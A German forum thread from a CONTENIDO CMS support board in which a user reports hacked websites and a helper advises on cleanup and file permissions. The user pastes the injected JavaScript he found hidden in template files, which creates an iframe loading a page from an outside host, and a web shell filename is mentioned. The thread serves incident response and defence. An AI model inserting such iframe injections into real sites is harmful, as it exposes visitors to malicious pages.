VIRUS / HACKERANGRIFF auf CONTENIDO! Sicherheitslücke!?!?

[prepress89]

Hey CONTENIDO-Freunde,

bei einem unserer Internetauftritte hat sich vermutl. jemand eingehackt! Hier muss schnellstens etwas passieren.

Auf folgenden Seiten wurden mysteriöse iFrames mit einem "OK" zu diversen Seiten eingebettet. Dies haben weder wir noch unser Kunde veranlasst! Gestern war dies noch nicht, da konnte ich noch an der Seite arbeiten. Da sind mir allerdings schon komische Scripte im Navigations-li-Template aufgefallen die diese unschönen ">" bei der Navigation veranlassen. Hatte länger nicht an der Seite gearbeitet und nicht genau gewusst für was die Scripte waren und habe Sie einfach entfernt - dann ging es weider. Nun sind diese ">" allerdings wieder drinnen.

http://www.diesonnenreiter.de/cms/
http://www.diesonnenreiter.de/contenido/

CONTENIDO Version ist seit gestern die 4.8.18 - davor 4.8.14. Evtl hat sich schon vor dem Update etwas eingenistet?!

Wie kann dies passieren!? Der Kunde möchte über das Wochenende an der Seite arbeiten was so nicht funktioniert und natürlich alles andere als Seriös auf uns wirkt!
Ich kann natürlich ein altes Backup einspielen aber wie kann ich mir sicher sein das soetwas nicht wieder passiert?

Vielen vielen Dank!
Alex


/edit:

Bei den Modul-Templates ist bei FAST JEDER HTML-Datei folgender Script hinterlegt - nicht von mir!!! Aber sehr gut versteckt: immer gaaaaanz rechts, dass man erst weit scrollen muss damit man das überhaupt sieht.. Ist das vermutl. der Übeltäter? Wie kommt der da rein?... das ist doch ne Schweinerei...

Code: Alles auswählen

<!--68c8c7--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          (function () {    var id = '84754';    var da09 = document.createElement('iframe');    da09.src = 'http://www.enders-bautechnik.de/rel.php';    da09.style.position = 'absolute';    da09.style.border = '1';    da09.style.height = '31px';    da09.style.width = '42px';    da09.style.left = '500px';    da09.style.top = '100px';    if (!document.getElementById('da')) {        document.write('<style>body{overflow-x:hidden;}</style>');        document.write('<div id=\'da\' style="position:absolute; width:80%; height:100%;" ></div>');        document.getElementById('da').appendChild(da09);    }})();</script><!--/68c8c7-->  

[Spider IT]

Hallo Alex,

die wahrscheinlichste Ursache ist ein Trojaner auf dem PC (des Kunden), der die Passwörter ausspioniert und dem Hacker übermittelt.
Dabei ist dann bestimmt auch ein FTP-Passwort (bzw. die kompletten Zugangsdaten).
Damit kommt der Hacker dann an die Dateien, welche er dann infiziert.
Abhilfe: PC von Virenscanner-CD starten und bereinigen, dann sämtliche Passwörter ändern.

Die meisten Dateien (die von Contenido) kannst du aus dem Paket ersetzen, die individuellen Dateien (wie Modul-Templates, Stylesheets, Scripte und include-Dateien) musst du von Hand bereinigen.
Auch solltest du nach Dateien ausschau halten, die dort nichts zu suchen haben, wie z.B. love.php (gibt dem Hacker uneingeschränkten Zugriff per Browser).
Das einfachste (und beste) ist, alles lokal zu sichern, dann online komplett löschen, dann Contenido frisch hochladen, dann aus der Sicherung (bereinigt) die /contenido/includes/config.php hochladen, dann die bereinigten individuellen Dateien hochladen, dann schauen ob in /contenido/plugins zusätzlichen Plugins installiert waren und diese nach Möglichkeit frisch hochladen (sonst bereinigt).

Gruß
René

[prepress89]

Vielen Dank für die Antwort. Dies ist das erste Mal das so etwas bei uns passiert ist. Heute haben wir entdeckt, dass es bei einem weiteren CONTENIDO-Auftritt bei dem selben Provider ebenfalls aufgetreten ist.

Nach genauerem nachforschen waren nur die Template und JS-Dateien betroffen. Bei sind ja in einem Ordner mit CHMOD 777. Kann es daran liegen, dass ein externer so relativ leicht Zugriff auf diese Datein hat? Standardmäßig hat mein Provider alle Ordner mit CHMOD 755 - ich habe mal alle 777er Ordner in 755 geändert und es scheint immer noch alles zu funktionieren. So sind die Schreibrechte nur noch beim Benutzer und nicht für Gruppen/Öffentlich.
Wäre CHMOD 744 evtl noch sinnvoller? Benötigt CONTENIDO das Recht "Ausführen" für irgendetwas?

Laut Provider passieren solche attacken täglich. Die waren alles andere als überrascht und haben in etwas das selbe gesagt wie du (Trojaner etc).

Gruß Alex

[Spider IT]

Hallo Alex,

777 ist generell nicht zu empfehlen, da man damit Schreibrechte an Alle vergibt.
Was "Ausführen" angeht, kann ich dir nicht sagen, es sind ja eigentlich keine ausführbare Dateien vorhanden.
Bei html, js und css Dateien sollte man auch das abschalten können.
Ob es Sinn macht, ist wieder ein ganz anderes Thema, denn ausführen kann man soweit ich weiß Dateien/Programme nur auf dem System selbst, z.B. in der Konsole.

Gruß
René